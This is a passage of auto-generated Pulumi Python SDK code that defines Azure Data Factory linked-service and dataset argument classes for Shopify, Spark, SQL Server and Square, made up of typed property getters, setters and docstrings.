@access_token.setter
def access_token(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "access_token", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter(name="useEncryptedEndpoints")
def use_encrypted_endpoints(self) -> Optional[Any]:
"""
Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true.
"""
return pulumi.get(self, "use_encrypted_endpoints")
@use_encrypted_endpoints.setter
def use_encrypted_endpoints(self, value: Optional[Any]):
pulumi.set(self, "use_encrypted_endpoints", value)
@property
@pulumi.getter(name="useHostVerification")
def use_host_verification(self) -> Optional[Any]:
"""
Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true.
"""
return pulumi.get(self, "use_host_verification")
@use_host_verification.setter
def use_host_verification(self, value: Optional[Any]):
pulumi.set(self, "use_host_verification", value)
@property
@pulumi.getter(name="usePeerVerification")
def use_peer_verification(self) -> Optional[Any]:
"""
Specifies whether to verify the identity of the server when connecting over SSL. The default value is true.
"""
return pulumi.get(self, "use_peer_verification")
@use_peer_verification.setter
def use_peer_verification(self, value: Optional[Any]):
pulumi.set(self, "use_peer_verification", value)
@pulumi.input_type
class ShopifyObjectDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
Shopify Service dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'ShopifyObject')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class SparkLinkedServiceArgs:
def __init__(__self__, *,
authentication_type: pulumi.Input[str],
host: Any,
port: Any,
type: pulumi.Input[str],
allow_host_name_cn_mismatch: Optional[Any] = None,
allow_self_signed_server_cert: Optional[Any] = None,
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
enable_ssl: Optional[Any] = None,
encrypted_credential: Optional[Any] = None,
http_path: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
server_type: Optional[pulumi.Input[str]] = None,
thrift_transport_protocol: Optional[pulumi.Input[str]] = None,
trusted_cert_path: Optional[Any] = None,
use_system_trust_store: Optional[Any] = None,
username: Optional[Any] = None):
"""
Spark Server linked service.
:param pulumi.Input[str] authentication_type: The authentication method used to access the Spark server.
:param Any host: IP address or host name of the Spark server
:param Any port: The TCP port that the Spark server uses to listen for client connections.
:param pulumi.Input[str] type: Type of linked service.
:param Any allow_host_name_cn_mismatch: Specifies whether to require a CA-issued SSL certificate name to match the host name of the server when connecting over SSL. The default value is false.
:param Any allow_self_signed_server_cert: Specifies whether to allow self-signed certificates from the server. The default value is false.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any enable_ssl: Specifies whether the connections to the server are encrypted using SSL. The default value is false.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param Any http_path: The partial URL corresponding to the Spark server.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: The password corresponding to the user name that you provided in the Username field
:param pulumi.Input[str] server_type: The type of Spark server.
:param pulumi.Input[str] thrift_transport_protocol: The transport protocol to use in the Thrift layer.
:param Any trusted_cert_path: The full path of the .pem file containing trusted CA certificates for verifying the server when connecting over SSL. This property can only be set when using SSL on self-hosted IR. The default value is the cacerts.pem file installed with the IR.
:param Any use_system_trust_store: Specifies whether to use a CA certificate from the system trust store or from a specified PEM file. The default value is false.
:param Any username: The user name that you use to access Spark Server.
"""
pulumi.set(__self__, "authentication_type", authentication_type)
pulumi.set(__self__, "host", host)
pulumi.set(__self__, "port", port)
pulumi.set(__self__, "type", 'Spark')
if allow_host_name_cn_mismatch is not None:
pulumi.set(__self__, "allow_host_name_cn_mismatch", allow_host_name_cn_mismatch)
if allow_self_signed_server_cert is not None:
pulumi.set(__self__, "allow_self_signed_server_cert", allow_self_signed_server_cert)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if enable_ssl is not None:
pulumi.set(__self__, "enable_ssl", enable_ssl)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if http_path is not None:
pulumi.set(__self__, "http_path", http_path)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if password is not None:
pulumi.set(__self__, "password", password)
if server_type is not None:
pulumi.set(__self__, "server_type", server_type)
if thrift_transport_protocol is not None:
pulumi.set(__self__, "thrift_transport_protocol", thrift_transport_protocol)
if trusted_cert_path is not None:
pulumi.set(__self__, "trusted_cert_path", trusted_cert_path)
if use_system_trust_store is not None:
pulumi.set(__self__, "use_system_trust_store", use_system_trust_store)
if username is not None:
pulumi.set(__self__, "username", username)
@property
@pulumi.getter(name="authenticationType")
def authentication_type(self) -> pulumi.Input[str]:
"""
The authentication method used to access the Spark server.
"""
return pulumi.get(self, "authentication_type")
@authentication_type.setter
def authentication_type(self, value: pulumi.Input[str]):
pulumi.set(self, "authentication_type", value)
@property
@pulumi.getter
def host(self) -> Any:
"""
IP address or host name of the Spark server
"""
return pulumi.get(self, "host")
@host.setter
def host(self, value: Any):
pulumi.set(self, "host", value)
@property
@pulumi.getter
def port(self) -> Any:
"""
The TCP port that the Spark server uses to listen for client connections.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Any):
pulumi.set(self, "port", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="allowHostNameCNMismatch")
def allow_host_name_cn_mismatch(self) -> Optional[Any]:
"""
Specifies whether to require a CA-issued SSL certificate name to match the host name of the server when connecting over SSL. The default value is false.
"""
return pulumi.get(self, "allow_host_name_cn_mismatch")
@allow_host_name_cn_mismatch.setter
def allow_host_name_cn_mismatch(self, value: Optional[Any]):
pulumi.set(self, "allow_host_name_cn_mismatch", value)
@property
@pulumi.getter(name="allowSelfSignedServerCert")
def allow_self_signed_server_cert(self) -> Optional[Any]:
"""
Specifies whether to allow self-signed certificates from the server. The default value is false.
"""
return pulumi.get(self, "allow_self_signed_server_cert")
@allow_self_signed_server_cert.setter
def allow_self_signed_server_cert(self, value: Optional[Any]):
pulumi.set(self, "allow_self_signed_server_cert", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="enableSsl")
def enable_ssl(self) -> Optional[Any]:
"""
Specifies whether the connections to the server are encrypted using SSL. The default value is false.
"""
return pulumi.get(self, "enable_ssl")
@enable_ssl.setter
def enable_ssl(self, value: Optional[Any]):
pulumi.set(self, "enable_ssl", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter(name="httpPath")
def http_path(self) -> Optional[Any]:
"""
The partial URL corresponding to the Spark server.
"""
return pulumi.get(self, "http_path")
@http_path.setter
def http_path(self, value: Optional[Any]):
pulumi.set(self, "http_path", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The password corresponding to the user name that you provided in the Username field
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="serverType")
def server_type(self) -> Optional[pulumi.Input[str]]:
"""
The type of Spark server.
"""
return pulumi.get(self, "server_type")
@server_type.setter
def server_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "server_type", value)
@property
@pulumi.getter(name="thriftTransportProtocol")
def thrift_transport_protocol(self) -> Optional[pulumi.Input[str]]:
"""
The transport protocol to use in the Thrift layer.
"""
return pulumi.get(self, "thrift_transport_protocol")
@thrift_transport_protocol.setter
def thrift_transport_protocol(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "thrift_transport_protocol", value)
@property
@pulumi.getter(name="trustedCertPath")
def trusted_cert_path(self) -> Optional[Any]:
"""
The full path of the .pem file containing trusted CA certificates for verifying the server when connecting over SSL. This property can only be set when using SSL on self-hosted IR. The default value is the cacerts.pem file installed with the IR.
"""
return pulumi.get(self, "trusted_cert_path")
@trusted_cert_path.setter
def trusted_cert_path(self, value: Optional[Any]):
pulumi.set(self, "trusted_cert_path", value)
@property
@pulumi.getter(name="useSystemTrustStore")
def use_system_trust_store(self) -> Optional[Any]:
"""
Specifies whether to use a CA certificate from the system trust store or from a specified PEM file. The default value is false.
"""
return pulumi.get(self, "use_system_trust_store")
@use_system_trust_store.setter
def use_system_trust_store(self, value: Optional[Any]):
pulumi.set(self, "use_system_trust_store", value)
@property
@pulumi.getter
def username(self) -> Optional[Any]:
"""
The user name that you use to access Spark Server.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: Optional[Any]):
pulumi.set(self, "username", value)
@pulumi.input_type
class SparkObjectDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
Spark Server dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'SparkObject')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class SqlServerLinkedServiceArgs:
def __init__(__self__, *,
connection_string: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
user_name: Optional[Any] = None):
"""
SQL Server linked service.
:param Any connection_string: The connection string. Type: string, SecureString or AzureKeyVaultSecretReference.
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: The on-premises Windows authentication password.
:param Any user_name: The on-premises Windows authentication user name. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "connection_string", connection_string)
pulumi.set(__self__, "type", 'SqlServer')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if password is not None:
pulumi.set(__self__, "password", password)
if user_name is not None:
pulumi.set(__self__, "user_name", user_name)
@property
@pulumi.getter(name="connectionString")
def connection_string(self) -> Any:
"""
The connection string. Type: string, SecureString or AzureKeyVaultSecretReference.
"""
return pulumi.get(self, "connection_string")
@connection_string.setter
def connection_string(self, value: Any):
pulumi.set(self, "connection_string", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The on-premises Windows authentication password.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="userName")
def user_name(self) -> Optional[Any]:
"""
The on-premises Windows authentication user name. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "user_name")
@user_name.setter
def user_name(self, value: Optional[Any]):
pulumi.set(self, "user_name", value)
@pulumi.input_type
class SqlServerTableDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
table_name: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
The on-premises SQL Server dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param Any table_name: The table name of the SQL Server dataset. Type: string (or Expression with resultType string).
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "table_name", table_name)
pulumi.set(__self__, "type", 'SqlServerTable')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter(name="tableName")
def table_name(self) -> Any:
"""
The table name of the SQL Server dataset. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "table_name")
@table_name.setter
def table_name(self, value: Any):
pulumi.set(self, "table_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class SquareLinkedServiceArgs:
def __init__(__self__, *,
client_id: Any,
host: Any,
redirect_uri: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
client_secret: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
use_encrypted_endpoints: Optional[Any] = None,
use_host_verification: Optional[Any] = None,
use_peer_verification: Optional[Any] = None):
"""
Square Service linked service.
:param Any client_id: The client ID associated with your Square application.
:param Any host: The URL of the Square instance. (i.e. mystore.mysquare.com)
:param Any redirect_uri: The redirect URL assigned in the Square application dashboard. (i.e. http://localhost:2500)
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] client_secret: The client secret associated with your Square application.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param Any use_encrypted_endpoints: Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true.
:param Any use_host_verification: Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true.
:param Any use_peer_verification: Specifies whether to verify the identity of the server when connecting over SSL. The default value is true.
"""
pulumi.set(__self__, "client_id", client_id)
pulumi.set(__self__, "host", host)
pulumi.set(__self__, "redirect_uri", redirect_uri)
pulumi.set(__self__, "type", 'Square')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if client_secret is not None:
pulumi.set(__self__, "client_secret", client_secret)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if use_encrypted_endpoints is not None:
pulumi.set(__self__, "use_encrypted_endpoints", use_encrypted_endpoints)
if use_host_verification is not None:
pulumi.set(__self__, "use_host_verification", use_host_verification)
if use_peer_verification is not None:
pulumi.set(__self__, "use_peer_verification", use_peer_verification)
@property
@pulumi.getter(name="clientId")
def client_id(self) -> Any:
"""
The client ID associated with your Square application.
"""
return pulumi.get(self, "client_id")
@client_id.setter
def client_id(self, value: Any):
pulumi.set(self, "client_id", value)
@property
@pulumi.getter
def host(self) -> Any:
"""
The URL of the Square instance. (i.e. mystore.mysquare.com)
"""
return pulumi.get(self, "host")
@host.setter
def host(self, value: Any):
pulumi.set(self, "host", value)
@property
@pulumi.getter(name="redirectUri")
def redirect_uri(self) -> Any:
"""
The redirect URL assigned in the Square application dashboard. (i.e. http://localhost:2500)
"""
return pulumi.get(self, "redirect_uri")
@redirect_uri.setter
def redirect_uri(self, value: Any):
pulumi.set(self, "redirect_uri", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="clientSecret")
def client_secret(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The client secret associated with your Square application.
"""
return pulumi.get(self, "client_secret")
@client_secret.setter
def client_secret(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "client_secret", value)
@property
@pulumi.getter(name="connectVia")
